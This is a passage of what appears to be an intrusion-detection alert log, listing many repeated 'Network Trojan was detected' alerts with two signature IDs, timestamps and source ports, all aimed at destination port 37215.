          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741412
          SID:2829579
          Source Port:34182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108088
          SID:2835222
          Source Port:57914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709169
          SID:2829579
          Source Port:34858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157410
          SID:2829579
          Source Port:36060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067789
          SID:2829579
          Source Port:59080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802501
          SID:2829579
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239057
          SID:2835222
          Source Port:41576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176324
          SID:2829579
          Source Port:58658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238156
          SID:2835222
          Source Port:45834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887563
          SID:2829579
          Source Port:52256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857599
          SID:2829579
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177040
          SID:2835222
          Source Port:54768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670000
          SID:2829579
          Source Port:35720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019082
          SID:2829579
          Source Port:55546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601344
          SID:2829579
          Source Port:40956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668256
          SID:2835222
          Source Port:45354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306463
          SID:2829579
          Source Port:56722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741805
          SID:2829579
          Source Port:36146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782784
          SID:2829579
          Source Port:34292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738607
          SID:2829579
          Source Port:48966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271227
          SID:2829579
          Source Port:47346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602175
          SID:2829579
          Source Port:44010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515489
          SID:2829579
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600777
          SID:2835222
          Source Port:55618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896753
          SID:2835222
          Source Port:50884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892608
          SID:2829579
          Source Port:54950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462192
          SID:2829579
          Source Port:56138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266154
          SID:2835222
          Source Port:54930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355990
          SID:2829579
          Source Port:45376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085427
          SID:2829579
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440854
          SID:2829579
          Source Port:53118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272310
          SID:2829579
          Source Port:56010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128162
          SID:2829579
          Source Port:45114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168539
          SID:2829579
          Source Port:36532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020907
          SID:2829579
          Source Port:54748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740056
          SID:2835222
          Source Port:39602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107680
          SID:2829579
          Source Port:40862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741335
          SID:2829579
          Source Port:55608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709626
          SID:2829579
          Source Port:33782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791499
          SID:2829579
          Source Port:50546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108934
          SID:2829579
          Source Port:38868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108674
          SID:2829579
          Source Port:36780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266393
          SID:2829579
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115721
          SID:2835222
          Source Port:36848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035637
          SID:2835222
          Source Port:53496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801182
          SID:2835222
          Source Port:58852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405930
          SID:2829579
          Source Port:54086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.804922
          SID:2829579
          Source Port:54524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107490
          SID:2829579
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742446
          SID:2835222
          Source Port:58908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178737
          SID:2829579
          Source Port:53254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241256
          SID:2835222
          Source Port:59410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729709
          SID:2835222
          Source Port:48410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815346
          SID:2835222
          Source Port:46182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107133
          SID:2829579
          Source Port:39718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706585
          SID:2835222
          Source Port:56164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744095
          SID:2835222
          Source Port:47784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127955
          SID:2835222
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891377
          SID:2835222
          Source Port:39768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861190
          SID:2835222
          Source Port:32900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893804
          SID:2835222
          Source Port:43130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180130
          SID:2829579
          Source Port:59112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601295
          SID:2835222
          Source Port:43186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159637
          SID:2829579
          Source Port:55560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911250
          SID:2829579
          Source Port:45560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862008
          SID:2829579
          Source Port:51418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087380
          SID:2835222
          Source Port:41936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895746
          SID:2835222
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671408
          SID:2835222
          Source Port:48124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709757
          SID:2835222
          Source Port:35670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817755
          SID:2835222
          Source Port:34246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352840
          SID:2835222
          Source Port:38320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861175
          SID:2835222
          Source Port:60480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099461
          SID:2829579
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817651
          SID:2835222
          Source Port:37328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440937
          SID:2835222
          Source Port:44416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896469
          SID:2829579
          Source Port:33586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897398
          SID:2835222
          Source Port:51980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744349
          SID:2835222
          Source Port:45942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466311
          SID:2835222
          Source Port:47838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798606
          SID:2835222
          Source Port:45684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832304
          SID:2829579
          Source Port:37516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109313
          SID:2835222
          Source Port:51466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239753
          SID:2829579
          Source Port:48240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160978
          SID:2835222
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602755
          SID:2829579
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410737
          SID:2835222
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040459
          SID:2829579
          Source Port:38512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239235
          SID:2829579
          Source Port:57932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465078
          SID:2829579
          Source Port:50382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672518
          SID:2835222
          Source Port:56568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730067
          SID:2829579
          Source Port:51688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514493
          SID:2829579
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745284
          SID:2835222
          Source Port:41328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014513
          SID:2829579
          Source Port:54462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297327
          SID:2829579
          Source Port:40840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108162
          SID:2829579
          Source Port:47534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353058
          SID:2829579
          Source Port:52590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513508
          SID:2835222
          Source Port:46802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601428
          SID:2835222
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462062
          SID:2829579
          Source Port:38358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157169
          SID:2835222
          Source Port:34006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233516
          SID:2829579
          Source Port:56378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912426
          SID:2829579
          Source Port:50658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741877
          SID:2829579
          Source Port:35048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671686
          SID:2835222
          Source Port:43504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860092
          SID:2835222
          Source Port:48950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891352
          SID:2829579
          Source Port:59522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599606
          SID:2829579
          Source Port:52392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606375
          SID:2835222
          Source Port:42398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843688
          SID:2835222
          Source Port:50396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127337
          SID:2835222
          Source Port:52954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738512
          SID:2835222
          Source Port:59084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462350
          SID:2835222
          Source Port:47738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020549
          SID:2829579
          Source Port:38732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087538
          SID:2829579
          Source Port:56560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.144870
          SID:2835222
          Source Port:38008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185430
          SID:2835222
          Source Port:52394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115562
          SID:2829579
          Source Port:35034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746461
          SID:2835222
          Source Port:42550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175245
          SID:2835222
          Source Port:45056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160677
          SID:2835222
          Source Port:54046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893616
          SID:2835222
          Source Port:56196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.110084
          SID:2835222
          Source Port:35472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040294
          SID:2835222
          Source Port:58928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159740
          SID:2835222
          Source Port:35050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351945
          SID:2835222
          Source Port:50716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741229
          SID:2835222
          Source Port:48912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353328
          SID:2835222
          Source Port:47032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131143
          SID:2835222
          Source Port:39974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160866
          SID:2829579
          Source Port:45946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884174
          SID:2835222
          Source Port:60250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353638
          SID:2835222
          Source Port:48496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735126
          SID:2829579
          Source Port:56164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107292
          SID:2829579
          Source Port:60074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403808
          SID:2835222
          Source Port:55248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551778
          SID:2835222
          Source Port:40828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734511
          SID:2835222
          Source Port:56232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440787
          SID:2829579
          Source Port:50068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.183447
          SID:2835222
          Source Port:39460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808095
          SID:2829579
          Source Port:43758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542586
          SID:2829579
          Source Port:43706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040367
          SID:2829579
          Source Port:49466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078502
          SID:2829579
          Source Port:56010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742013
          SID:2835222
          Source Port:35230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862035
          SID:2829579
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553145
          SID:2829579
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355709
          SID:2835222
          Source Port:54164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112127
          SID:2835222
          Source Port:57674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891491
          SID:2835222
          Source Port:57028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269260
          SID:2829579
          Source Port:38584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.026011
          SID:2829579
          Source Port:60666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550014
          SID:2829579
          Source Port:44002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783008
          SID:2829579
          Source Port:56548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035090
          SID:2829579
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352848
          SID:2829579
          Source Port:36192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466427
          SID:2835222
          Source Port:41908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600318
          SID:2829579
          Source Port:59506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128648
          SID:2835222
          Source Port:53244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152885
          SID:2835222
          Source Port:33480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406489
          SID:2829579
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595253
          SID:2829579
          Source Port:47850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860066
          SID:2829579
          Source Port:50724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707844
          SID:2835222
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461725
          SID:2835222
          Source Port:54192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511335
          SID:2829579
          Source Port:54598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409785
          SID:2835222
          Source Port:57506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099373
          SID:2835222
          Source Port:43710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509190
          SID:2829579
          Source Port:53258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115347
          SID:2835222
          Source Port:36824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837441
          SID:2835222
          Source Port:58282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161290
          SID:2829579
          Source Port:52824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407945
          SID:2829579
          Source Port:48574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106447
          SID:2835222
          Source Port:53186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056334
          SID:2829579
          Source Port:55080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087292
          SID:2835222
          Source Port:56260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462251
          SID:2829579
          Source Port:38888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446333
          SID:2835222
          Source Port:58606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241453
          SID:2829579
          Source Port:39396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467482
          SID:2835222
          Source Port:46068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465574
          SID:2835222
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465649
          SID:2829579
          Source Port:35248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055297
          SID:2835222
          Source Port:34368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294913
          SID:2835222
          Source Port:37108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238451
          SID:2835222
          Source Port:40016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160845
          SID:2829579
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818677
          SID:2829579
          Source Port:37936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264478
          SID:2829579
          Source Port:48238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743177
          SID:2835222
          Source Port:35532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708848
          SID:2829579
          Source Port:37164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601301
          SID:2829579
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606385
          SID:2835222
          Source Port:36124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704185
          SID:2829579
          Source Port:57484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912161
          SID:2829579
          Source Port:60682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555445
          SID:2829579
          Source Port:53762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733073
          SID:2829579
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044742
          SID:2835222
          Source Port:45842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
